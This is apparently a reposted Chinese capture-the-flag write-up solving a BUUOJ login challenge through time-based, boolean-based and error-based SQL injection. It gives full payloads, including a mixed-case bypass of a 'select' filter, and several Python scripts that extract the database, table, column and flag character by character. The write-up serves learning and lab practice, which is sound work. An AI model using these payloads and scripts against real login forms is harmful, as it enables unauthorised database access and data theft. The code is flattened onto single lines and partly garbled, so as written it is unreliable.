本文共 8632 字,大约阅读时间需要 28 分钟。
?tips=1
降低难度成为一个基于报错的盲注。 本题所有脚本均用傻逼爆破,没有用二分法,有兴趣的大佬可以根据我提供的脚本二次开发,可以的话在评论区给个链接(菜鸡对二分法不是很懂,觉得写脚本的时间还不如等爆破完成) 首先测试库名长度
name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd等了3秒,我们默认是sleep1秒,但是不知道为什么睡的时间是输入的3-4倍左右,不管了,反正长度是4(1-4慢慢试)
然后测试库名:
substr(a,b,c)
,a
处为需要截取的字符,b
处为从第几位开始,c
处为截取几位。比如substr(database(),2,1)
就是将数据库名从第2位开始截取1位,即取第二个字符(如果库名为note
结果就是o
)name=1'+or+if(substr(database(),1,1)='n',sleep(1),1)#&pass=asdasd过了三秒才有回显,于是判断第一位是
n
写个脚本 import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"flag = ''length=4for num in range(1,length+1): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("flag:" , flag) breakprint(flag)
注意,这里‘select’被过滤了,可以使用双写绕过,也可以使用大小写绕过
name=1'+or+if(substr((seLEct+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),1,1)='f',sleep(1),1)#&pass=asdasd
测第一位,结果是f
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"flag = ''for num in range(1,100): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("flag:" , flag) breakprint("flag:", flag)
name=1'+or+if(substr((seLEct+group_concat(column_name)+from+information_schema.columns+where+table_name='fl4g'),1,1)='f',sleep(1),1)#&pass=asdasd
第一位是f
,盲猜是flag
,但是还是测试一下:
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"flag = ''for num in range(1,100): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("column_name:" , flag) breakprint("column_name:", flag)
字段名是flag
查flag长度
name=1'+or+if(length((seLEct+flag+from+fl4g))=26,sleep(3),1)#&pass=asdasd
长度为26。
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"#sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"sql = "1' or if(substr((seLEct flag from fl4g),%d,1)='%s',sleep(2),1)#"flag = ''for num in range(1,27): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("flag:" , flag) breakprint("flag:", flag)
首先研究一下登录界面的报错信息
用admin登录,显示密码错误,用其他账号登录,显示账号不存在。这样子就说明了两个点:True
还是False
burp抓包并发送试试:
admin: {"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}w4ke: {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}
这里都是页面信息,那么我们可以根据这个信息来进行判断我们的输入是否正确,构造payload:
name=1' or 1=1#&pass=asdasd发现页面返回的信息是True,这里解释一下为什么是True:
首先判断username = '1' ⇒ False然后判断 1=1 ⇒ TrueFalse or True ⇒ True
所以只要后面构造的是True,那么整个语句就是True,然后开始构造第一个攻击脚本
name=1' or length(database())=4#&pass=asdasd数据库长度为4
name=1' or substr(database(),1,1)='n'#&pass=asdasd库名第一个字母是
n
构造脚本: import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'sql = "1' or substr(database(),%d,1)='%s'#"flag = ''for num in range(1,5): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.2) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag)
name=1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='f'#&pass=asdasd表的第一位是
f
上脚本 import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or substr(database(),%d,1)='%s'#"sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"flag = ''for num in range(1,8): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.2) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag)
name=1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),1,1)='f'#&pass=asdasd字段名的第一位也是
f
上脚本:
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or substr(database(),%d,1)='%s'#"#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"flag = ''for num in range(1,13): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.2) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag)
name=1' or substr((seLEct flag from fl4g),1,1)='n'#&pass=asdasd第一位是
n
上脚本: import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or substr(database(),%d,1)='%s'#"#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"#sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"sql = "=1' or substr((seLEct flag from fl4g),%d,1)='%s'#"flag = ""for num in range(1,28): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.05) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag)
首先题目提示难度太大可以在url后面加一个?tips=1
,菜鸡发现这边可以显示报错信息。
extractvalue
,updatexml
等,用法差不多,这边就用updatexml
吧。 name=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=asdasd这里直接爆出数据库名
name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&pass=asdasd
name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1)#&pass=asdasd
name=1' and updatexml(1,concat(0x7e,(seLEct flag from fl4g),0x7e),1)#&pass=asdasd
转载地址:http://zopbi.baihongyu.com/